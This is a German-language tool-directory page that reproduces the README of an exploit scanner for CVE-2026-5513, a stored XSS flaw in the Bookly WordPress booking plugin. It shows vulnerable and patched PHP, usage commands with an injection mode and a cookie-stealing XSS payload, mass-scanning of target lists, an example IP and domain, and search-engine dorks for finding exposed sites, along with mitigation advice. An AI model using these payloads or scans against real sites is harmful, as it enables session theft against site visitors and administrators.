Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-5513 — CVE-2026-5513: Bookly <= 27.2 Stored XSS via Cookie (Unauthenticated) | Kitploit
Tools/GitHubGitHub/xaanziu/cve-2026-5513
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubxaanziu/cve-2026-5513

CVE-2026-5513

CVE-2026-5513: Bookly <= 27.2 Stored XSS via Cookie (Unauthenticated)

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-5513 — Bookly ≤ 27.2 Gespeichertes XSS über Cookie

CVE CVSS Type Auth

Übersicht

FeldWert
CVE-IDCVE-2026-5513
SchwachstelleGespeichertes Cross-Site Scripting (XSS)
PluginBookly — Online-Terminplanungs- und Buchungssystem
Betroffen≤ 27.2
Gepatcht27.3+
CVSS 3.17.2 (Hoch) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CWECWE-79
Authentifizierung erforderlichKeine
Voraussetzung„Persönliche Informationen in Cookies speichern“ muss aktiviert sein (standardmäßig deaktiviert)

Beschreibung

Das Bookly-Plugin für WordPress ist anfällig für Gespeichertes Cross-Site Scripting über den Cookie bookly-customer-full-name in Versionen bis einschließlich 27.2 aufgrund unzureichender Eingabebereinigung und Ausgabe-Escaping.

Wenn die Einstellung „Persönliche Informationen in Cookies speichern“ aktiviert ist, liest das Plugin den Wert des Cookies bookly-customer-full-name und gibt ihn direkt in das HTML des Buchungsformulars aus, ohne ordnungsgemäßes Escaping. Ein nicht authentifizierter Angreifer kann über diesen Cookie beliebige JavaScript-Nutzlasten injizieren, die ausgeführt werden, sobald ein Benutzer (einschließlich Administratoren) eine Seite mit dem Bookly-Buchungsformular besucht.

Angriffsablauf

root@kitploit:~
Angreifer → Bösartigen Cookie setzen (bookly-customer-full-name=<script>...</script>)
         → Seite mit Bookly-Buchungsformular besuchen
         → Plugin liest Cookie, gibt Wert ohne Escaping aus
         → XSS-Nutzlast wird im Browserkontext des Opfers ausgeführt

Ursache

root@kitploit:~
// GEFÄHRDET — Bookly ≤ 27.2
$full_name = $_COOKIE['bookly-customer-full-name'];  // Keine Bereinigung
echo '<input type="text" value="' . $full_name . '" />';  // Kein Escaping
root@kitploit:~
// GEPATCHT — Bookly 27.3+
$full_name = sanitize_text_field($_COOKIE['bookly-customer-full-name']);
echo '<input type="text" value="' . esc_attr($full_name) . '" />';

Funktionen

root@kitploit:~
 ✓ Automatische IP-/Domain-Überprüfung (HTTP/HTTPS, gängige Ports, Weiterleitungserkennung)
 ✓ Erkennung des WordPress- und Bookly-Plugins mit Versionsprüfung
 ✓ Erkennung der Cookie-Einstellung (BooklyL10n JS-Analyse + Canary-Reflexion)
 ✓ XSS-Tests in mehreren Kontexten (HTML, JavaScript, Attribut-Injektion)
 ✓ Nutzlast-Injektion mit Reflexionsüberprüfung
 ✓ Einzelziel oder Massenscan aus Datei
 ✓ Multithread-Scan (bis zu 20 Threads)
 ✓ Proxy-Unterstützung (Burp usw.)
 ✓ Automatisches Speichern verwundbarer Ergebnisse
 ✓ Interaktives Menü + CLI-Modi

Installation

root@kitploit:~
pip install requests colorama

Verwendung

CLI-Modus

root@kitploit:~
# Einzelziel prüfen
python CVE-2026-5513.py -u https://target.com -v

# Einzel-IP prüfen (automatische Portabfrage + Weiterleitungen)
python CVE-2026-5513.py -u 167.99.0.203 -v

# Prüfen + XSS-Nutzlast injizieren
python CVE-2026-5513.py -u https://target.com --inject -v

# Benutzerdefinierte XSS-Nutzlast
python CVE-2026-5513.py -u https://target.com --inject --payload "<svg onload=alert(document.cookie)>"

# Massenscan aus Datei
python CVE-2026-5513.py -l targets.txt -t 20 -o vuln.txt

# Mit Burp-Proxy
python CVE-2026-5513.py -u https://target.com -v --proxy http://127.0.0.1:8080

Interaktiver Modus

root@kitploit:~
python CVE-2026-5513.py

Optionen

Zielformate

Das Tool akzeptiert jedes dieser Formate in -u oder in der Ziellistendatei:

root@kitploit:~
https://example.com
http://example.com
example.com
192.168.1.100
192.168.1.100:8080

Bei IP-Adressen ohne Domain führt das Tool automatisch Folgendes durch:

  • Prüft Ports 443, 80, 8443, 8080
  • Erkennt HTTP → HTTPS-Weiterleitungen
  • Erkennt IP → Domain-Weiterleitungen (z.B. 167.99.0.203 → https://book.repairrite.com)
  • Durchsucht WordPress-Unterverzeichnisse (/wp/, /blog/, /wordpress/ usw.)

Exploit-Kette

root@kitploit:~
Schritt 0 → Ziel überprüfen (IP/Domain → Basis-URL auflösen, Weiterleitungen erkennen)
Schritt 1 → Bookly-Plugin erkennen (readme.txt, Plugin-Verzeichnis, Assets, Versionsprüfung)
Schritt 2 → Cookie-Einstellung prüfen (BooklyL10n JS-Analyse + Canary-Reflexionstest)
Schritt 3 → XSS-Reflexion testen (HTML-Kontext, JS-Kontext, Attribut-Kontext)
Schritt 4 → Nutzlast injizieren (falls --inject-Modus, Reflexion überprüfen)

Google Dorks

root@kitploit:~
# FOFA
body="bookly-responsive-appointment-booking-tool"
body="bookly-customer-full-name"
body="bookly-form-group" && body="wp-content/plugins/bookly"

# Google
inurl:"/wp-content/plugins/bookly-responsive-appointment-booking-tool/readme.txt"
intitle:"Book Appointment" inurl:"booking" intext:"bookly"

Abhilfe

PrioritätAktion
🔴Bookly auf Version 27.3+ aktualisieren
🟡Deaktivieren Sie „Persönliche Informationen in Cookies speichern“ in Bookly-Einstellungen → Allgemein
🟢

Referenzen

  • NVD — CVE-2026-5513
  • Wordfence Advisory
  • Tenable
  • Bookly Changelog

Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bereitgestellt. Der unbefugte Zugriff auf Computersysteme ist illegal. Holen Sie vor dem Testen stets die entsprechende Genehmigung ein. Der Autor übernimmt keine Verantwortung für Missbrauch dieses Tools.

Lizenz

MIT

Tool herunterladen
FlagBeschreibung
-u URLEinzelziel (URL, Domain oder IP)
-l FILEDatei mit Zielliste (eine pro Zeile)
--injectXSS-Nutzlast injizieren (Standard: nur prüfen)
--payload STRBenutzerdefinierte XSS-Nutzlast
-t NAnzahl der Threads (Standard: 10, max: 20)
--proxy URLHTTP-Proxy (z.B. http://127.0.0.1:8080)
-o FILEErgebnisse in Datei speichern
-vAusführliche Ausgabe
WAF-Regeln bereitstellen, um XSS in Cookie-Werten zu filtern
🟢Content-Security-Policy (CSP)-Header implementieren